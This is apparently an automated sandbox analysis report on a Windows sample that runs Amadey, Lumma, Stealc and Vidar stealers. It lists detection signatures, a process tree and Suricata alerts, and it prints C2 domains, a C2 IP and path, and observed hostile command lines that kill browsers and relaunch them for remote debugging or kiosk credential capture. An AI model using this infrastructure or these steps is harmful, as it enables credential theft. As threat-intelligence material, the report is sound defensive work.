Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1574898
MD5:	f401f240c068bac2c47c4beb9446d2a0
SHA1:	2e659821c32f600fe2715814e5d96ff0eac09eb4
SHA256:	3ca467dad80a62f640093dcf65b29e413820c24288e3ac5dbfb4ca7639dd55d4
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Stealc

Yara detected Vidar stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops VBS files to the startup folder

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: WScript or CScript Dropper

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F401F240C068BAC2C47C4BEB9446D2A0)

skotes.exe (PID: 7400 cmdline: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: F401F240C068BAC2C47C4BEB9446D2A0)

skotes.exe (PID: 8028 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: F401F240C068BAC2C47C4BEB9446D2A0)

BlueMail.exe (PID: 5640 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe" MD5: D39986C91EE9D1291E85711894112178)

BlueMail.exe (PID: 4072 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe" MD5: D39986C91EE9D1291E85711894112178)

Gxtuum.exe (PID: 6836 cmdline: "C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe" MD5: D39986C91EE9D1291E85711894112178)

3b636bd67f.exe (PID: 1008 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3b636bd67f.exe (PID: 6360 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

3b636bd67f.exe (PID: 6328 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)

c2bea0d661.exe (PID: 4876 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe" MD5: DFD5F78A711FA92337010ECC028470B4)

chrome.exe (PID: 2176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2388,i,2229604721330968177,18404601518371306528,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 2088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

8f25543307.exe (PID: 7444 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014880001\8f25543307.exe" MD5: FE4E63699F62090A1BC0006AB3F7856C)

a629a70424.exe (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014881001\a629a70424.exe" MD5: 2A78CE9F3872F5E591D643459CABE476)

75e257f622.exe (PID: 4248 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe" MD5: D99F0062878EA8743875AC2F12FEB7D6)

taskkill.exe (PID: 5808 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2584 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5172 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6104 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7984 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 1788 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

9f2ded7baa.exe (PID: 6008 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe" MD5: 106C3E2370747EF310E8952FD337895C)

Gxtuum.exe (PID: 1252 cmdline: C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe MD5: D39986C91EE9D1291E85711894112178)

wscript.exe (PID: 5652 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

vmwin.exe (PID: 6304 cmdline: "C:\Users\user\AppData\Local\Temp\vmwin.exe" MD5: D39986C91EE9D1291E85711894112178)

firefox.exe (PID: 8004 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7540 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 280 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2212 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1110a5b-abe5-4b46-a8d5-e81b4ffdee10} 7540 "\\.\pipe\gecko-crash-server-pipe.7540" 20db436d510 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

75e257f622.exe (PID: 2648 cmdline: "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe" MD5: D99F0062878EA8743875AC2F12FEB7D6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["covery-mover.biz", "formy-spill.biz", "fightlsoser.click", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "zinc-sneark.biz", "impend-differ.biz", "print-vexer.biz"], "Build id": "cMBsTw--Installs"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000002D.00000003.2522812356.0000000004D80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.2328283170.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3185422148.0000000000CBC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1560:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.3453206176.0000000000780000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4fac:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002D.00000002.3208807770.00000000003C1000.00000040.00000001.01000000.00000020.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.2789644908.0000000003850000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002D.00000002.3211612383.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.2324029799.00000000044B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000014.00000002.3194281955.0000000004B30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: BlueMail.exe PID: 5640	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: BlueMail.exe PID: 5640	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: c2bea0d661.exe PID: 4876	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: c2bea0d661.exe PID: 4876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Gxtuum.exe PID: 6836	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Gxtuum.exe PID: 6836	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Gxtuum.exe PID: 1252	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Gxtuum.exe PID: 1252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vmwin.exe PID: 6304	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: vmwin.exe PID: 6304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 75e257f622.exe PID: 4248	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.BlueMail.exe.4583270.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
22.2.Gxtuum.exe.391f290.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.2.BlueMail.exe.4583270.0.raw.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
21.2.BlueMail.exe.5a0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.2.BlueMail.exe.5de0000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
22.2.Gxtuum.exe.391f290.0.raw.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.file.exe.e00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.skotes.exe.360000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\75e257f622.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , ProcessId: 5652, ProcessName: wscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe, ParentProcessId: 4876, ParentProcessName: c2bea0d661.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2176, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\75e257f622.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , ProcessId: 7400, ProcessName: skotes.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs" , ProcessId: 5652, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe, ProcessId: 5640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:40.722833+0100	2028371	3	Unknown Traffic	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:53:46.009812+0100	2028371	3	Unknown Traffic	192.168.2.7	49902	23.55.153.106	443	TCP
2024-12-13T18:54:42.038292+0100	2028371	3	Unknown Traffic	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:46.716100+0100	2028371	3	Unknown Traffic	192.168.2.7	50046	23.55.153.106	443	TCP
2024-12-13T18:54:58.135865+0100	2028371	3	Unknown Traffic	192.168.2.7	50061	104.21.79.7	443	TCP
2024-12-13T18:55:02.667391+0100	2028371	3	Unknown Traffic	192.168.2.7	50066	23.55.153.106	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.281993+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:54:43.045377+0100	2054653	1	A Network Trojan was detected	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:59.620659+0100	2054653	1	A Network Trojan was detected	192.168.2.7	50061	104.21.79.7	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.281993+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:54:43.045377+0100	2049836	1	A Network Trojan was detected	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:59.620659+0100	2049836	1	A Network Trojan was detected	192.168.2.7	50061	104.21.79.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:42.038292+0100	2058160	1	Domain Observed Used for C2 Detected	192.168.2.7	50041	104.21.35.43	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:33.093606+0100	2008438	1	A Network Trojan was detected	45.155.249.199	80	192.168.2.7	50025	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:28.384672+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49859	185.215.113.43	80	TCP
2024-12-13T18:53:35.698466+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49876	185.215.113.43	80	TCP
2024-12-13T18:53:41.933769+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49890	185.215.113.43	80	TCP
2024-12-13T18:53:50.584093+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49915	185.215.113.43	80	TCP
2024-12-13T18:54:00.591637+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49942	185.215.113.43	80	TCP
2024-12-13T18:54:07.909956+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49968	185.215.113.43	80	TCP
2024-12-13T18:54:18.752301+0100	2044696	1	A Network Trojan was detected	192.168.2.7	50000	185.215.113.43	80	TCP
2024-12-13T18:54:29.343788+0100	2044696	1	A Network Trojan was detected	192.168.2.7	50029	185.215.113.43	80	TCP
2024-12-13T18:54:42.570400+0100	2044696	1	A Network Trojan was detected	192.168.2.7	50042	185.215.113.43	80	TCP
2024-12-13T18:54:55.564147+0100	2044696	1	A Network Trojan was detected	192.168.2.7	50057	185.215.113.43	80	TCP
2024-12-13T18:58:02.638543+0100	2044696	1	A Network Trojan was detected	192.168.2.7	50222	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:43.209697+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.7	52838	1.1.1.1	53	UDP
2024-12-13T18:54:44.425114+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.7	62082	1.1.1.1	53	UDP
2024-12-13T18:55:00.201818+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.7	55846	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
